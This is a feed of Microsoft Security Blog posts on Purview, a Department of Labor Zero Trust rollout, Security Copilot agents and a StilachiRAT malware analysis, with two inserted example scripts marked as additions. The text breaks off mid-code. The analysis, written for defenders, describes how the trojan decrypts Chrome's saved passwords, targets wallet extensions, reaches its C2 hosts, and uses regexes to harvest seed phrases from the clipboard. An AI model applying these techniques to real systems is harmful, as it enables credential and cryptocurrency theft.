Within the Unified Catalog in Microsoft Purview, users can easily identify the root cause of data quality issues by visually investigating the relationship between governance domains, data products, glossary terms, and data assets associated with them through its lineage. Data assets and their respective data quality are visible across your multicloud, hybrid data estate. Maintaining high data quality is core to driving trustworthy AI innovation forward, and with the new data observability capabilities in Microsoft Purview, users can now improve how fast they can investigate and resolve root cause issues to improve data quality and respond to regulatory reporting requirements.

Figure 5. Lineage view of data assets that showcases data quality within a Data Product.

Microsoft Purview and Microsoft Fabric can help secure and activate data

As your organization continues to implement AI, Microsoft Fabric and Microsoft Purview will serve as key solutions to safely activate your data for AI. Stay tuned for even more exciting innovations to come and check out the Fabric blog to read more about the innovations in Fabric.

Learn more about Microsoft Purview

Learn more

Explore these resources to stay updated on our product innovations in security and governance for your data:

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

1Work Trends Index

2AI Regulations around the World – 2025

The post New innovations in Microsoft Purview for protected, AI-ready data appeared first on Microsoft Security Blog.

Categories: Microsoft

US Department of Labor’s journey to Zero Trust security with Microsoft Entra ID

Microsoft Malware Protection Center - Thu, 03/27/2025 - 12:00pm

For several years, Microsoft has been helping United States federal and state government groups, including military departments and civilian agencies, transition to a Zero Trust security model. Advanced features in Microsoft Entra ID have helped these organizations meet requirements to employ centralized identity management systems, to use phishing-resistant multifactor authentication, and to consider device-level signals for authorizing access to resources.

Manage and protect with Microsoft Entra ID

The US Department of Labor (DOL) has been on a journey to consolidate their identity systems and modernize authentication to applications. In this blog post, I’ll describe the benefits they’re gaining from supplementing personal identity verification (PIV) cards with device-bound passkeys implemented through the Microsoft Authenticator app and from adding risk signals to Microsoft Entra Conditional Access policies.

To review how Microsoft Entra ID can help your department or agency meet federal cybersecurity requirements, while reducing complexity and improving the user experience, visit Microsoft Entra ID: Enhancing identity security for US agencies.

Adopting Microsoft Entra ID as a centralized identity system

Like many organizations, DOL first used Entra ID (then called Azure Active Directory) when they adopted Microsoft 365. At that time, they were maintaining multiple identity technologies, including on-premises Active Directory, Active Directory Federation Services, and Ping Federate. This fragmented strategy required users to authenticate to different applications using different identity systems.

With the help of their Identity, Credential, and Access Management (ICAM) group, DOL worked to consolidate all their identity systems to Entra ID. They chose Entra ID because it supports the necessary protocols (such as SAML and OIDC) to deliver a single sign-on (SSO) experience for most of their applications. This effort, which took about a year, included reaching out to application owners and encouraging them to move their applications off Kerberos, ideally by adopting MSAL (Microsoft Authentication Library), so their applications could easily integrate with Entra ID.

Integrating applications with Entra ID makes it possible to strengthen security by applying Conditional Access policies to them. DOL at first applied simple Conditional Access policies that only allowed access to applications from hybrid-joined Government Furnished Equipment (GFE) devices. The COVID-19 pandemic accelerated their adoption of additional features, such as enforcing device compliance through Microsoft Intune and reporting device risk to other security services through integration with Microsoft Defender for Endpoint. Policies could then make access decisions based on device risk, such as only granting access to applications from devices with “low risk” or “no risk.”

Increase protection with Microsoft Entra Conditional Access

For an introduction to Microsoft Entra Conditional Access, visit our documentation.

Upleveling static Conditional Access policies to risk-based Conditional Access policies

In 2022, when new regulations required government agencies to apply more stringent cybersecurity standards to protect against sophisticated online attacks, DOL decided to strengthen their Zero Trust implementation with phishing-resistant authentication and dynamic risk-based Conditional Access policies. Both would help them enforce the Zero Trust principle of least privilege access.

Microsoft Entra ID Protection capabilities made it possible for Conditional Access policies to assess sign-in risk and user risk, in addition to device risk, before granting access. Policies would tolerate different levels of user risk depending on whether the user signs in as a ‘privileged user’ or as a ‘regular user.’ Access for users deemed high-risk would always be blocked. Privileged users with low or medium risk would also be blocked. Regular users with low risk would have to reauthenticate within a set period of time, while users with medium risk would have to reauthenticate more frequently.

Block identity takeover with Microsoft Entra ID Protection

For more in-depth information on risk-based Conditional Access policies, visit our documentation.

Adding a layer of security for privileged users

A subset of DOL employees may operate as a ‘privileged user’ for some tasks and as a ‘regular user’ for others. To access less sensitive applications such as Microsoft 365, these employees sign in as a ‘regular user’ using a government-issued PIV card or Windows Hello for Business from their GFE device. To access highly sensitive applications and resources, or to execute sensitive tasks, they must sign in using a separate account that has privileged access rights.

Previously, the DOL assigned usernames, passwords, and basic multifactor authentication to privileged accounts, but this still left some risk of credential theft from phishing attacks. Since the most important accounts to secure are those with administrative rights, DOL chose to make privileged accounts more secure with phishing-resistant authentication, specifically, with device-bound passkeys in the Microsoft Authenticator app. This is faster and less expensive to support than issuing employees a second PIV card and a second GFE device.

Privileged users only need to install the Microsoft Authenticator app on their government-issued cell phone. They don’t have to visit a special portal to provision and onboard their passkey. They simply sign in for the first time on their mobile phone using a Temporary Access Pass and set up their passkey in one fast, frictionless workflow. As an added benefit, passkeys also reduce the time to authenticate to DOL applications. According to Microsoft testing, signing in with a passkey is eight times faster than using a password and traditional multifactor authentication.1

After DOL finishes deploying passkeys for their privileged users, they plan to roll out passkeys to the rest of their workforce as a secondary authentication method that complements other passwordless methods such as Windows Hello for Business and certificate-based authentication (CBA).

To explore phishing-resistant authentication methods available with Microsoft Entra, explore the video series Phishing-resistant authentication in Microsoft Entra ID.

Using “report-only” mode in Conditional Access as a modeling tool

Every organization that modernizes their identity strategy and authentication methods, as DOL did, strengthens security, improves flexibility, and reduces costs. Using a modern, deeply integrated security toolset will also provide valuable new insights. For example, you can use Conditional Access as a modeling and planning tool. By running policies in report-only mode, you can better understand your environment, investigate user behavior to uncover risk scenarios not visible to the human eye, and model solutions for those scenarios. This helps you decide which controls to apply to close any security gaps you discover.

DOL rolled out risk-based Conditional Access policies, in report-only mode, that enforce the use of passkeys by privileged users. In the activity reports, they observed employees signing in with their privileged accounts, then visiting portals that they should access as regular users, not as admins. DOL then adjusted their policies to block such behavior.

Running risk-based policies in report-only mode exposed behavior that DOL could then use policies to control. It also helped them to uncover inconsistencies and redundancies that reflected unaddressed technical debt; for example, policies that collided. Their goal is to consolidate and simplify their static policies into fewer, more comprehensive risk-based policies that block dangerous or unauthorized behavior while allowing employees to sign in faster and more securely to get their work done.
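The tiered risk policies described under “Upleveling static Conditional Access policies” and the report-only rollout described above, expressed as Microsoft Graph conditionalAccessPolicy objects and created through the Microsoft Graph PowerShell SDK. This is an added example, not DOL’s configuration or a script published by Microsoft. It assumes the privileged-user population is represented by the Global Administrator directory role, that “reauthenticate within a set period” maps to the sign-in frequency session control, and that the passkey requirement is expressed with the built-in “Phishing-resistant MFA” authentication strength; the one-day and one-hour intervals and the break-glass account ID are placeholders.

```powershell
# Added example: risk-based Conditional Access policies created in report-only
# mode so their effect shows up in sign-in logs without blocking anyone.
# Requires the Microsoft.Graph.Identity.SignIns module.
Import-Module Microsoft.Graph.Identity.SignIns

# Placeholders / assumptions (not from the blog post):
$breakGlassId   = "<break-glass-account-object-id>"            # always exclude emergency access accounts
$privilegedRole = "62e90394-69f5-4237-9190-012177145e10"       # Global Administrator role template ID
$phishingResistantStrength = "00000000-0000-0000-0000-000000000004"  # built-in "Phishing-resistant MFA"

# Scopes for the three user populations in the policy design.
$allUsers        = @{ includeUsers = @("All"); excludeUsers = @($breakGlassId) }
$privilegedUsers = @{ includeRoles = @($privilegedRole); excludeUsers = @($breakGlassId) }
$regularUsers    = @{ includeUsers = @("All"); excludeRoles = @($privilegedRole); excludeUsers = @($breakGlassId) }

$block = @{ operator = "OR"; builtInControls = @("block") }

function Get-SignInFrequency([int]$Value, [string]$Unit) {
    # Session control that forces reauthentication after the given interval.
    @{ signInFrequency = @{ isEnabled = $true; value = $Value; type = $Unit; frequencyInterval = "timeBased" } }
}

function New-ReportOnlyPolicy {
    param(
        [string]$Name,
        [hashtable]$Users,
        [string[]]$UserRiskLevels = @(),
        [hashtable]$Grant = $null,
        [hashtable]$Session = $null
    )
    $policy = @{
        displayName = $Name
        state       = "enabledForReportingButNotEnforced"   # report-only: evaluated and logged, never enforced
        conditions  = @{
            users        = $Users
            applications = @{ includeApplications = @("All") }
        }
    }
    if ($UserRiskLevels.Count -gt 0) { $policy.conditions.userRiskLevels = $UserRiskLevels }
    if ($Grant)   { $policy.grantControls   = $Grant }
    if ($Session) { $policy.sessionControls = $Session }
    return $policy
}

$policies = @(
    # High user risk is blocked for everyone.
    New-ReportOnlyPolicy -Name "CA-Risk-01 Block high user risk (all users)" `
        -Users $allUsers -UserRiskLevels @("high") -Grant $block
    # Privileged users tolerate no risk at all: low or medium risk is blocked too.
    New-ReportOnlyPolicy -Name "CA-Risk-02 Block privileged users at low or medium user risk" `
        -Users $privilegedUsers -UserRiskLevels @("low", "medium") -Grant $block
    # Regular users at low risk reauthenticate within a set period (placeholder: daily).
    New-ReportOnlyPolicy -Name "CA-Risk-03 Regular users at low risk: reauthenticate daily" `
        -Users $regularUsers -UserRiskLevels @("low") -Session (Get-SignInFrequency 1 "days")
    # Regular users at medium risk reauthenticate more often (placeholder: hourly).
    New-ReportOnlyPolicy -Name "CA-Risk-04 Regular users at medium risk: reauthenticate hourly" `
        -Users $regularUsers -UserRiskLevels @("medium") -Session (Get-SignInFrequency 1 "hours")
    # Privileged sign-ins must use a phishing-resistant method (device-bound passkeys qualify).
    New-ReportOnlyPolicy -Name "CA-Auth-01 Privileged users: require phishing-resistant MFA" `
        -Users $privilegedUsers -Grant @{ operator = "OR"; authenticationStrength = @{ id = $phishingResistantStrength } }
)

Connect-MgGraph -Scopes "Policy.ReadWrite.ConditionalAccess", "Policy.Read.All"
foreach ($p in $policies) {
    $created = New-MgIdentityConditionalAccessPolicy -BodyParameter $p
    Write-Host ("Created {0} [{1}] id={2}" -f $created.DisplayName, $created.State, $created.Id)
}
```

Once the policies exist, each sign-in in the Entra sign-in logs carries a per-policy report-only result, which is where the kind of finding described above (a privileged account visiting a portal meant for regular use) becomes visible; only after reviewing those results would the state be switched from report-only to enabled.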

To learn more about Conditional Access report-only mode, visit our documentation.

Looking ahead

So far, DOL has integrated more than 200 applications with Entra ID for SSO. The team is still in the monitoring phase as they work to consolidate Conditional Access policies and ensure compliance with security requirements, such as the use of passkeys for accessing high-value assets. Not only are they reducing the number of policies they must maintain, but their logs are also cleaner, and it’s easier to find insights.

DOL’s future plans include implementing attestation, which will ensure that employees use a genuine version of the Authenticator app published by Microsoft before registering a passkey. They’re also investigating joining devices to Entra ID so they can centrally manage them from the cloud for easier deployment of updates, policies, and applications. This will also allow them to use policy to enforce enrollment in Windows Hello for Business, further advancing their transition to phishing-resistant authentication.

Learn more

Learn more about Microsoft Entra ID.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

1Convincing a billion users to love passkeys: UX design insights from Microsoft to boost adoption and security, Sangeeta Ranjit and Scott Bingham. December 12, 2024.

The post US Department of Labor’s journey to Zero Trust security with Microsoft Entra ID appeared first on Microsoft Security Blog.


Microsoft unveils Microsoft Security Copilot agents and new protections for AI

Microsoft Malware Protection Center - Mon, 03/24/2025 - 12:00pm

In this age of AI, securing AI and using it to boost security are crucial for every organization. At Microsoft, we are dedicated to helping organizations secure their future with our AI-first, end-to-end security platform.

One year ago, we launched Microsoft Security Copilot to empower defenders to detect, investigate, and respond to security incidents swiftly and accurately. Now, we are excited to announce the next evolution of Security Copilot with AI agents designed to autonomously assist with critical areas such as phishing, data security, and identity management. The relentless pace and complexity of cyberattacks have surpassed human capacity and establishing AI agents is a necessity for modern security.

For example, phishing attacks remain one of the most common and damaging cyberthreats. Between January and December 2024, Microsoft detected more than 30 billion phishing emails targeting customers.1 The volume of these cyberattacks overwhelms security teams relying on manual processes and fragmented defenses, making it difficult to both triage malicious messages promptly and leverage data-driven insights for broader cyber risk management.

The phishing triage agent in Microsoft Security Copilot being unveiled today can handle routine phishing alerts and cyberattacks, freeing up human defenders to focus on more complex cyberthreats and proactive security measures. This is just one way agents can transform security.

Additionally, securing and governing AI continues to be the top priority for organizations, and we are excited to advance our purpose-built solutions with new innovations across Microsoft Defender, Microsoft Entra, and Microsoft Purview. 

Read on to learn about other agents we are introducing to Security Copilot and important developments in securing AI. 

Expanding Microsoft Security Copilot with AI agentic capabilities

Microsoft Threat Intelligence now processes 84 trillion signals per day, revealing the exponential growth in cyberattacks, including 7,000 password attacks per second.1 Scaling cyber defenses through AI agents is now an imperative to keep pace with this threat landscape. We are expanding Security Copilot with six security agents built by Microsoft and five security agents built by our partners—available for preview in April 2025.

Six new agentic solutions from Microsoft Security

Building on the transformative capabilities of Security Copilot, the six Microsoft Security Copilot agents enable teams to autonomously handle high-volume security and IT tasks while seamlessly integrating with Microsoft Security solutions. Purpose-built for security, agents learn from feedback, adapt to workflows, and operate securely—aligned to Microsoft’s Zero Trust framework. With security teams fully in control, agents accelerate responses, prioritize risks, and drive efficiency to enable proactive protection and strengthen an organization’s security posture.

Security Copilot agents will be available across the Microsoft end-to-end security platform, designed for the following:

  • Phishing Triage Agent in Microsoft Defender triages phishing alerts with accuracy to identify real cyberthreats and false alarms. It provides easy-to-understand explanations for its decisions and improves detection based on admin feedback.
  • Alert Triage Agents in Microsoft Purview triage data loss prevention and insider risk alerts, prioritize critical incidents, and continuously improve accuracy based on admin feedback.
  • Conditional Access Optimization Agent in Microsoft Entra monitors for new users or apps not covered by existing policies, identifies necessary updates to close security gaps, and recommends quick fixes for identity teams to apply with a single click.
  • Vulnerability Remediation Agent in Microsoft Intune monitors and prioritizes vulnerabilities and remediation tasks to address app and policy configuration issues and expedites Windows OS patches with admin approval.
  • Threat Intelligence Briefing Agent in Security Copilot automatically curates relevant and timely threat intelligence based on an organization’s unique attributes and cyberthreat exposure.

Security Copilot’s agentic capabilities are an example of how we continue to deliver innovation leveraging our decades of AI research. See how agents work.

“This is just the beginning; our security AI research is pushing the boundaries of innovation, and we are eager to continuously bring even greater value to our customers at the speed of AI.”  

—Alexander Stojanovic, Vice President of Microsoft Security AI Applied Research

Five new agentic solutions from Microsoft Security partners

Security is a team sport and Microsoft is committed to empowering our security ecosystem with an open platform upon which partners can build to deliver value to customers. In this spirit, the following five AI agents from our partners will be available in Security Copilot:

  • Privacy Breach Response Agent by OneTrust analyzes data breaches to generate guidance for the privacy team on how to meet regulatory requirements.
  • Network Supervisor Agent by Aviatrix performs root cause analysis and summarizes issues related to VPN, gateway, or Site2Cloud connection outages and failures.
  • SecOps Tooling Agent by BlueVoyant assesses a security operations center (SOC) and state of controls to make recommendations that help optimize security operations and improve controls, efficacy, and compliance.
  • Alert Triage Agent by Tanium provides analysts with the necessary context to quickly and confidently make decisions on each alert.
  • Task Optimizer Agent by Fletch helps organizations forecast and prioritize the most critical cyberthreat alerts to reduce alert fatigue and improve security.

“An agentic approach to privacy will be game-changing for the industry. Autonomous AI agents will help our customers scale, augment, and increase the effectiveness of their privacy operations. Built using Microsoft Security Copilot, the OneTrust Privacy Breach Response Agent demonstrates how privacy teams can analyze and meet increasingly complex regulatory requirements in a fraction of the time required historically.”

—Blake Brannon, Chief Product and Strategy Officer, OneTrust

Learn more about Security Copilot agents and get started with Security Copilot. Current Security Copilot customers can join our Customer Connection Program for the latest updates.

New AI-powered data security investigations and analysis   

We are also announcing Microsoft Purview data security investigations to help data security teams quickly understand and mitigate risks associated with sensitive data exposure. Data security investigations introduce AI-powered deep content analysis, which identifies sensitive data and other risks linked to incidents. Incident investigators can use these insights to collaborate securely with partner teams and simplify complex and time-consuming tasks, thus improving mitigation. This solution links data security investigations to Defender incidents and Purview insider risk cases—available for preview starting April 2025.  

Further advances in securing and governing generative AI

Successful AI transformation requires a strong cybersecurity foundation. As organizations rapidly adopt generative AI, there is growing urgency to secure and govern the creation, adoption, and use of AI in the workplace. According to our new report, “Secure employee access in the age of AI,” 57% of organizations report an increase in security incidents from AI usage. And while most organizations recognize the need for AI controls, 60% have not yet started.

Securing AI is still a relatively new challenge, and leaders share some specific concerns: how to prevent data oversharing and leakage; how to minimize new AI threats and vulnerabilities; and how to comply with shifting regulatory compliance requirements. Microsoft Security solutions are purpose-built for AI to help every organization address these concerns. We’re announcing new advanced capabilities so that organizations can secure their AI investments—both Microsoft AI and other AI.

AI security posture management for multimodel and multicloud environments

Organizations developing their own custom AI solutions will need to strengthen the security posture for AI that they source from multiple models, running in multiple AI platforms and clouds. To address this need, Microsoft Defender has extended AI security posture management beyond Microsoft Azure and Amazon Web Services to include Google VertexAI and all models in the Azure AI Foundry model catalog. Available for preview in May 2025, this coverage includes Gemini, Gemma, Meta Llama, Mistral, and custom models. With new multicloud interoperability, organizations will gain broader code-to-runtime AI security posture visibility across Microsoft Azure, Amazon Web Services, and Google Cloud. Microsoft Defender can give organizations a jumpstart to securing AI posture across multimodel and multicloud environments.

New detection and protection for emerging AI threats

With AI comes new risks, including new cyberattack surfaces and unknown vulnerabilities. The Open Worldwide Application Security Project (OWASP) identifies the highest priority risks and mitigations for generative AI apps. Starting in May 2025, new and enriched AI detections for several risks identified by OWASP such as indirect prompt injection attacks, sensitive data exposure, and wallet abuse will be generally available in Microsoft Defender. With these new detections, SOC analysts can better protect and defend custom-built AI apps with new safeguards for Azure OpenAI Service and models found in the Azure AI Foundry catalog.

New controls to prevent risky access and data leaks into shadow AI apps

With the rapid user adoption of generative AI, many organizations are uncovering widespread use of AI apps that have not yet been approved by IT or security teams. This unsanctioned, unprotected use of AI has created a “shadow AI” phenomenon, which has drastically increased the risk of sensitive data leakage. We are announcing general availability of AI web category filter in Microsoft Entra internet access to help enforce granular access controls that can curb the risk of shadow AI by enforcing policies governing which users and groups have access to different types of AI applications.

With policy enforcement in place to govern authorized access to AI apps, the next layer of defense is to prevent users from leaking sensitive data into AI apps. To address this, we are announcing the preview of Microsoft Purview browser data loss prevention (DLP) controls built into Microsoft Edge for Business. This helps security teams enforce DLP policies to prevent sensitive data from being typed into generative AI apps, starting with ChatGPT, Copilot Chat, DeepSeek, and Google Gemini.

Learn more about our new innovations in Security for AI.

New phishing protection in Microsoft Teams for safer collaboration

While email continues to be the primary cyberthreat vector for phishing, collaboration software has become a common target. Generally available in April 2025, Microsoft Defender for Office 365 will protect users against phishing and other advanced cyberthreats within Teams. With inline protection, Teams will have better protection against malicious URLs, including real-time detonation of attachments and links. And to give SOC teams full visibility into related attempts and incidents, alerts and data will be available in Microsoft Defender. 

Agile innovation to build a safer world

We continue to innovate across the Microsoft Security portfolio, applying the principles of our Secure Future Initiative, to deliver powerful, end-to-end protection to give defenders industry-leading AI, and to empower every organization with the tools to secure and govern AI. We are grateful for our customers and partners and together, with them, we look forward to building a more secure world for all.

Microsoft Secure

To see these innovations in action, join us on April 9, 2025 for Microsoft Secure, a digital event focused on security in the age of AI. 

Register now

Learn with Microsoft Security

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

1Based on Microsoft internal data.

The post Microsoft unveils Microsoft Security Copilot agents and new protections for AI appeared first on Microsoft Security Blog.


AI innovation requires AI security: Hear what’s new at Microsoft Secure

Microsoft Malware Protection Center - Tue, 03/18/2025 - 12:00pm

When you’re secure, innovation happens. But the fast pace of AI often outpaces traditional security measures, leaving gaps that bad actors can take advantage of. As a security professional, you’re the hero in this battle: protecting vast amounts of data while ensuring AI systems remain transparent and compliant. What you need in this time of new threats and complexity in securing interconnected AI applications is a proactive, innovative approach to stay ahead.

That’s why we’re excited to invite you to Microsoft Secure on April 9, a one-hour online event designed specifically for professionals like you. At Microsoft Secure, discover AI innovations for the security lifecycle designed to give you smarter, faster, stronger security.  

Why should you attend? 

At Microsoft Secure, you’ll get a first look into AI-first tools coming soon to help you in your day-to-day work. Plus, we’ll share how you can maximize what you’ve got in your hands right now.   

In 60 minutes, you’ll learn how you can: 

  • Harden your defenses: Learn how to secure your data used by AI, AI apps, and AI cloud workloads. Discover the latest tools and techniques to fortify your defenses against evolving threats. 
  • Secure your AI investments: Use data security, protection against AI-specific cyberthreats, and compliance tools to secure your AI investments. Our experts will share best practices and strategies to safeguard your AI initiatives, ensuring they remain resilient against emerging threats. 
  • Discover AI-first tools and best practices: Hear about new AI-first tools, demos, and best practices across your favorite Microsoft Security solutions. These sessions will provide you with practical insights and hands-on experiences to strengthen your security posture and leverage AI-driven solutions effectively.  
  • Keep up with what’s happening in security: Get the latest reports on security trends and platform innovations directly from Microsoft Security leaders. This is your chance to gain insights that can help you stay ahead of emerging threats. 

What can you expect? 

Led by security experts, Microsoft Secure is your chance to find out how to use solutions that can help you operate efficiently, stay compliant, and be more secure. 

  • Hear from organizations like yours: Explore compelling customer stories that showcase how end-to-end security can boost, not burden, your teams. These real-world examples will highlight the benefits of comprehensive security solutions and demonstrate how they can enhance productivity and efficiency without compromising on safety. 
  • Engage with Microsoft Security experts: Engage with Microsoft Security experts through live Q&A sessions. This interactive format will allow you to connect directly with our experts, ask questions, and gain valuable insights tailored to your specific needs. 


Check out the full agenda here

Microsoft Secure is more than just an event; it’s a community of like-minded professionals dedicated to moving the field of cybersecurity forward. Join us to get valuable insights, discover innovative solutions, and connect with industry leaders and peers who share your passion for security. Don’t miss this opportunity to elevate your security game and make a real impact in your organization. 

Join us on April 9, 2025. Register now and pick the broadcast that works for your time zone.

Microsoft Secure 

Wednesday, April 9, 2025 

8:00 AM-9:00 AM Pacific Time (UTC-7) 

Thursday, April 10, 2025  

10:00 AM – 11:00 AM Central European Time (GMT+1) 

Thursday, April 10, 2025  

12:00 PM – 1:00 PM Singapore Time (GMT+8) 

The post AI innovation requires AI security: Hear what’s new at Microsoft Secure appeared first on Microsoft Security Blog.

Categories: Microsoft

StilachiRAT analysis: From system reconnaissance to cryptocurrency theft

Microsoft Malware Protection Center - Mon, 03/17/2025 - 1:00pm

In November 2024, Microsoft Incident Response researchers uncovered a novel remote access trojan (RAT) we named StilachiRAT that demonstrates sophisticated techniques to evade detection, persist in the target environment, and exfiltrate sensitive data. Analysis of StilachiRAT’s WWStartupCtrl64.dll module, which contains the RAT capabilities, revealed the use of various methods to steal information from the target system, such as credentials stored in the browser, digital wallet information, data stored in the clipboard, as well as system information.

Microsoft has not yet attributed StilachiRAT to a specific threat actor or geolocation. Based on Microsoft’s current visibility, the malware does not exhibit widespread distribution at this time. However, due to its stealth capabilities and the rapid changes within the malware ecosystem, we are sharing these findings as part of our ongoing efforts to monitor, analyze, and report on the evolving threat landscape.

Microsoft security solutions can detect activities related to attacks that use StilachiRAT. To help defenders protect their network, we are also sharing mitigation guidance to help reduce the impact of this threat, detection details, and hunting queries. Microsoft continues to monitor information on the delivery vector used in these attacks. Malware like StilachiRAT can be installed through multiple vectors; therefore, it is critical to implement security hardening measures to prevent the initial compromise. 

This blog presents our detailed findings on all the key capabilities of StilachiRAT, which include:

  • System reconnaissance: Collects comprehensive system information, including operating system (OS) details, hardware identifiers, camera presence, active Remote Desktop Protocol (RDP) sessions, and running graphical user interface (GUI) applications, allowing detailed profiling of the target system.
  • Digital wallet targeting: Scans for configuration data of 20 different cryptocurrency wallet extensions for the Google Chrome browser.
  • Credential theft: Extracts and decrypts saved credentials from Google Chrome, gaining access to usernames and passwords stored in the browser.
  • Command-and-control (C2) connectivity: Establishes communication with remote C2 servers over TCP port 53, 443, or 16000, enabling remote command execution and potentially SOCKS-like proxying.
  • Command execution: Supports a variety of commands from the C2 server, including system reboots, log clearing, registry manipulation, application execution, and system suspension.
  • Persistence mechanisms: Achieves persistence through the Windows service control manager (SCM) and uses watchdog threads to ensure self-reinstatement if removed.
  • RDP monitoring: Monitors RDP sessions, capturing active window information and impersonating users, allowing for potential lateral movement within networks.
  • Clipboard and data collection: Continuously monitors clipboard content, actively searching for sensitive data like passwords and cryptocurrency keys, while tracking active windows and applications.
  • Anti-forensics and evasion: Employs anti-forensic tactics by clearing event logs, detecting analysis tools, and implementing sandbox-evading behaviors to avoid detection.
Technical analysis of key capabilities

System reconnaissance

StilachiRAT gathers extensive system information, including OS details, device identifiers, BIOS serial numbers, and camera presence. Information is collected through the Component Object Model (COM) Web-based Enterprise Management (WBEM) interfaces using WMI Query Language (WQL). The queries it executes retrieve, among other things:

  • Serial number
  • Camera presence
  • OS / system info (server, model, manufacturer)

Additionally, the malware creates a unique identifier for the infected device, derived from the system’s serial number and the attackers’ public RSA key. This identifier is stored in the registry under a CLSID key.

Figure 1. Example of a unique ID stored in the registry

Digital wallet targeting

StilachiRAT targets a list of specific cryptocurrency wallet extensions for the Google Chrome browser. It accesses the settings in the following registry key and validates if any of the extensions are installed:

\SOFTWARE\Google\Chrome\PreferenceMACs\Default\extensions.settings

The malware targets the following cryptocurrency wallet extensions:

Cryptocurrency wallet extension name – Chrome extension identifier

  • Bitget Wallet (formerly BitKeep) – jiidiaalihmmhddjgbnbgdfflelocpak
  • Trust Wallet – egjidjbpglichdcondbcbdnbeeppgdph
  • TronLink – ibnejdfjmmkpcnlpebklmnkoeoihofec
  • MetaMask (ethereum) – nkbihfbeogaeaoehlefnkodbefgpgknn
  • TokenPocket – mfgccjchihfkkindfppnaooecgfneiii
  • BNB Chain Wallet – fhbohimaelbohpjbbldcngcnapndodjp
  • OKX Wallet – mcohilncbfahbmgdjkbpemcciiolgcge
  • Sui Wallet – opcgpfmipidbgpenhmajoajpbobppdil
  • Braavos – Starknet Wallet – jnlgamecbpmbajjfhmmmlhejkemejdma
  • Coinbase Wallet – hnfanknocfeofbddgcijnmhnfnkdnaad
  • Leap Cosmos Wallet – fcfcfllfndlomdhbehjjcoimbgofdncg
  • Manta Wallet – enabgbdfcbaehmbigakijjabdpdnimlg
  • Keplr – dmkamcknogkgcdfhhbddcghachkejeap
  • Phantom – bfnaelmomeimhlpmgjnjophhpkkoljpa
  • Compass Wallet for Sei – anokgmphncpekkhclmingpimjmcooifb
  • Math Wallet – afbcbjpbpfadlkmhmclhkeeodmamcflc
  • Fractal Wallet – agechnindjilpccclelhlbjphbgnobpf
  • Station Wallet – aiifbnbfobpmeekipheeijimdpnlpgpp
  • ConfluxPortal – bjiiiblnpkonoiegdlifcciokocjbhkd
  • Plug – cfbfdhimifdmdehjmkdobpcjfefblkjm

Credential theft

StilachiRAT reads Google Chrome’s encrypted AES key (the os_crypt.encrypted_key value) from the Local State file in the user’s profile. Chrome protects that key with DPAPI under the user’s context when it is first written, so the malware calls the Windows APIs that decrypt it as the current user and thereby obtains the master key needed to read the password vault. The data is read from the following locations:

  • %LOCALAPPDATA%\Google\Chrome\User Data\Local State – stores Chrome’s configuration data, including the encrypted key.
  • %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data – stores entered user credentials.

The “Login Data” file is an SQLite database; the malware reads the stored credentials by querying it directly.

Command-and-control (C2)

There are two configured addresses for the C2 server – one is stored in obfuscated form and the other is an IP address converted to its binary format (instead of a regular string):

  • app.95560[.]cc
  • 194.195.89[.]47

The communications channel is established over TCP port 53, 443, or 16000, selected at random. Additionally, the malware checks for the presence of tcpview.exe and will not proceed if it is found. It also delays the initial connection by two hours, presumably to evade detection (automated sandboxes typically observe a sample for only a few minutes). Once connected, a list of active windows is sent to the server. Additional technical findings regarding C2 communications functionality are listed in the section below.

Figure 2. The malware delays connection to evade detection

Persistence mechanisms

StilachiRAT can be launched either as a Windows service or as a standalone component. In both cases, a mechanism is in place to ensure the malware isn’t removed.

A watchdog thread monitors both the EXE and dynamic link library (DLL) files used by the malware by periodically polling for their presence. If a file is found missing, it can be recreated from an internal copy obtained during initialization. Finally, the Windows service component can be recreated by modifying the relevant registry settings and restarting it through the SCM.

Figure 3. Monitoring for the presence of EXE and DLL files

Figure 4. Start the malware via SCM

RDP monitoring

StilachiRAT monitors RDP sessions by capturing foreground window information and duplicating security tokens to impersonate users. This is particularly risky on RDP servers hosting administrative sessions as it could enable lateral movement within networks.

The malware identifies the current session and its foreground window, then enumerates all other RDP sessions. For each session it finds, it locates the Windows Explorer shell process and duplicates that process’s security token. With the duplicated token, the malware can launch applications under that user’s privileges.

Figure 5. Enumerate RDP sessions

Figure 6. Launch process as another user

Data collection

StilachiRAT collects a variety of user data, including software installation records and active applications. It monitors active GUI windows, their title bar text, and file location, and sends this information to the C2 server, potentially allowing attackers to track user behavior.

Figure 7. Registry path for installed software

Figure 8. Read the title of an application window

Clipboard monitoring

StilachiRAT has a functionality that is responsible for monitoring clipboard data. Specifically, the malware can periodically read the clipboard, extract text based on search expressions, and then exfiltrate this data. Clipboard monitoring is continuous, with targeted searches for sensitive information such as passwords, cryptocurrency keys, and potentially personal identifiers.

The list below gives the regular expressions used to extract credentials from the clipboard. They are associated with the TRON blockchain, which is popular in Asia, especially in China. Note that the key pattern matches any 64-character hexadecimal string (a private key, but equally any SHA-256 hash), and the two TRX Pass patterns look for a 12-word seed phrase.

Credential – Regular expression to extract credential

  • TRX Address – `\bT[0-9a-zA-Z]{33}\b`
  • TRX Key – `\b(0x)?[0-9a-fA-F]{64}\b`
  • TRX Pass – `^\s*\b([0-9]*[.]*[a-wy-z][a-z]{2,}[ \t]*\b){12}\s*(\n|$)`
  • TRX Pass – `^\s*\b([0-9]*[.]*?[a-wy-z][a-z]{2,}\s*\b){12}\s*(\n|$)`

Figure 9. Access clipboard data

Figure 10. Modify clipboard data
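Added example (not from the Microsoft post): the four expressions above applied to a handful of constructed clipboard samples, the way a hunter might test what the malware would have picked up, or what a DLP rule built from the same patterns would flag. The end-of-line anchor in the two seed-phrase patterns is taken as (\n|$), and the samples are made up, not real wallet data.

```python
import re

# Patterns as listed in the table above. Assumption: the end-of-line anchor in
# the two seed-phrase patterns is (\n|$), i.e. newline or end of input.
TRX_PATTERNS = {
    "TRX address": re.compile(r"\bT[0-9a-zA-Z]{33}\b"),
    "TRX key": re.compile(r"\b(0x)?[0-9a-fA-F]{64}\b"),
    "TRX pass (spaces/tabs)": re.compile(
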